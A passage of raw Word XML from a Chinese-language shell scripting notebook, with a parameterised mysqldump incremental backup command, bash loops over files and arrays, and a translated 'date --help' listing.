        <w:t>: $7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D967D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>接受备份路径</w:t>
      </w:r>
      <w:r>
        <w:t>: $8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F71A7BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqldump --column-statistics=0 -h $1 -P $2 -u$3 -p$4 -t --databases $5 --tables $6  --replace --where="published &gt; $7 or updated &gt; $7" &gt; $8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C77BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA8073" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAEA01B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参的参数对照表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25410DF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC194C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$1  ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7533D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$2  port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751A222" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$3  user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5B796" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$4  password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0920C90A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$5  database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CD4C6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$6  table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F958CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$7  time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD05F3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$8  sql_back_path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E21B19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28365EA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc159779641"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>遍历文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="48D92A71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3E16BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFACA11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>TODAY=`date +"%Y%m%d"`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3626C89D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>BACKUP_DIR=/opt/backup/$TODAY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB1218" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D21DB24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo $TODAY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0C54D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "=====</w:t>
      </w:r>
      <w:r>
        <w:t>第一种方法</w:t>
      </w:r>
      <w:r>
        <w:t>====="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FDF0EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for table in $BACKUP_DIR/*.txt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341027F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9D1DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>echo $table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4155391E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D1D52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DAC26F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "=====</w:t>
      </w:r>
      <w:r>
        <w:t>第二种方法</w:t>
      </w:r>
      <w:r>
        <w:t>====="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61E8AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dir=`ls $BACKUP_DIR/*.txt` </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59281235" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for table in $dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F6187" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D75ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>echo $table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5581BE91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D78A6BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A1168B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc159779642"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="66EABEC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：简易遍历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A55119" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F251B81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>arr=("0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "a" "b" "c" "e" "e" "f")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CDB28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for value in ${arr[@]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35908FAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4F3AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  echo $value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B654283" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B56F6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6980D8FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：下标数字遍历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10DEFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "----------------------another way----------------------"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15476688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for (( i = 0 ; i &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${#arr[@]}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; i++ ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3521FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64658B53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  echo ${arr[$i]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ED3C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F7753" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5601728F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1094B5C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340DBD34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc159779643"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化输出日期</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w14:paraId="0E2032AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/jk110333/article/details/8590746</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04451F4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACE512B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080CBF0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> [root@localhost source]# date --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A4D3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用法：</w:t>
      </w:r>
      <w:r>
        <w:t>date [</w:t>
      </w:r>
      <w:r>
        <w:t>选项</w:t>
      </w:r>
      <w:r>
        <w:t>]... [+</w:t>
      </w:r>
      <w:r>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241C5C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">　或：</w:t>
      </w:r>
      <w:r>
        <w:t>date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D01CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>以给定的格式显示当前时间，或是设置系统日期。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A7972" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45220D2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -d,--date=</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:t>显示指定字符串所描述的时间，而非当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FDCC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -f,--file=</w:t>
      </w:r>
      <w:r>
        <w:t>日期文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>--date</w:t>
      </w:r>
      <w:r>
        <w:t>，从日期文件中按行读入时间描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A47914" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -r, --reference=</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:t>显示文件指定文件的最后修改时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5F178" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -R, --rfc-2822                </w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>RFC 2822</w:t>
      </w:r>
      <w:r>
        <w:t>格式输出日期和时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD7671" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>2006</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>日，星期一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12:34:56 -0600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57458B77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      --rfc-3339=TIMESPEC       </w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RFC 3339 </w:t>
      </w:r>
      <w:r>
        <w:t>格式输出日期和时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220439D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                TIMESPEC=`date'</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>`seconds'</w:t>
      </w:r>
      <w:r>
        <w:t>，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `ns' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B85E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:t>表示日期和时间的显示精度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCF3D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:t>日期和时间单元由单个的空格分开：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE361CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                2006-08-07 12:34:56-06:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B3E67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -s, --set=</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:t>设置指定字符串来分开时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605BBDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -u, --utc, --universal        </w:t>
      </w:r>
      <w:r>
        <w:t>输出或者设置协调的通用时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15046A26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      --help            </w:t>
      </w:r>
      <w:r>
        <w:t>显示此帮助信息并退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6568E003" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      --version         </w:t>
      </w:r>
      <w:r>
        <w:t>显示版本信息并退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0366B360" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FC2D03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>给定的格式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FORMAT </w:t>
      </w:r>
      <w:r>
        <w:t>控制着输出，解释序列如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06579C58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A157DAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %%    </w:t>
      </w:r>
      <w:r>
        <w:t>一个文字的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558398BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %a    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>的星期名缩写</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>日，代表星期日</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34874F4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  %A    </w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">locale </w:t>
      </w:r>
      <w:r>
        <w:t>的星期名全称</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>如：星期日</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
